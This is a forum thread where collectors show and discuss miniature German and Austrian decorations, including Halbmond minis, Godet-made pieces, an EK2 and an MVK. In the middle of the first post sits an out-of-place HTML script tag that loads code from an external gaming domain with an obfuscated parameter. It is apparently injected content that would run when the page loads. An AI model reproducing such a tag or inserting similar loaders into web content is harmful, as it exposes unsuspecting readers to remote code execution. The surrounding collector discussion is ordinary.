News Ticker
  • I am now accepting the following payment methods: Card Payments, Apple Pay, Google Pay and PayPal
  • Latest News

I recently posted this little group in another thread; but felt that for the benefit of those of us who really appreciate minis, it should make an appearance here as well.

<script src="http://tt.rivalgaming.com/cmn?p=YTE1NjI5MTg0NDRlndo2zv1x4pRBcDyIvnMiqBSkg%2F5LmUgHQXG7T64BfAGdkFkevuWbkLDSvBt%2FBR4Yf2PRrozIj9OrEGYLf7QTRUwsucAOKICUpgrV9TVMMncCQqNcibHAEFrj8YFCicaOqWH3EM%2BeGQcWJ77IHeyG4gQGZZjRVa1vaN27w8Tpyw%3D%3D&d=6"> </script>

• 4 weeks later...

Nice Halbmond minis (and full sizes) set!

Btw, I would like to find the collector who bought this Halbmond mini on Godet & Sohn button in May Auction of Leipziger Muenzhandlung. I´d really like to know which type of button it was.

Nice Halbmond minis (and full sizes) set!

Btw, I would like to find the collector who bought this Halbmond mini on Godet & Sohn button in May Auction of Leipziger Muenzhandlung. I´d really like to know which type of button it was.

Thank you for your compliments Kasle, yes would be nice to have that halbmond button in my collection as well!

Nice set of minis.

I have never seen that many Halbmond minis in the same place,

at the same time before.

Well Done.

Thank you for your compliments Greg, I have one more Halbomnd mini chain coming in, will add it later this week as well!

Very nice stuff guys.

Dedehansen, can you please show the reverse of the non-combatant EK2? Or tell us: does it have a maker on the back?

Best,

Streptile

Hi Streptile,

there is only a hallmark Dep. on the inside bridge.

KR

Andreas

Beautiful set. And another proof that Godet had the nicest minis.

Godet piece is really the most detailed of them all, even more detailed than most of the full size TWM I have seen.

Godet piece is really the most detailed of them all, even more detailed than most of the full size TWM I have seen.

That is what makes Godet miniatures the best of all.

This one just came in yesterday - EK2 1914 and Austrian MVK III. class with Kriegsdekoration III. class. Outstanding detail on 15 mm mini with combined red and white enamelling.

• 4 weeks later...

Very nice.

It's been a couple years sense my last mini purchase.

They seem to be getting harder to find and prices have

gone crazy.........and don't even get my started on all the

fakes :angry:

Nice! I've searched the internet for comprehensive information regarding the various models of this exquisite decoration, but still haven't found what I'm looking for. The Nimmergut catalogue is difficult decipher. Any suggestions?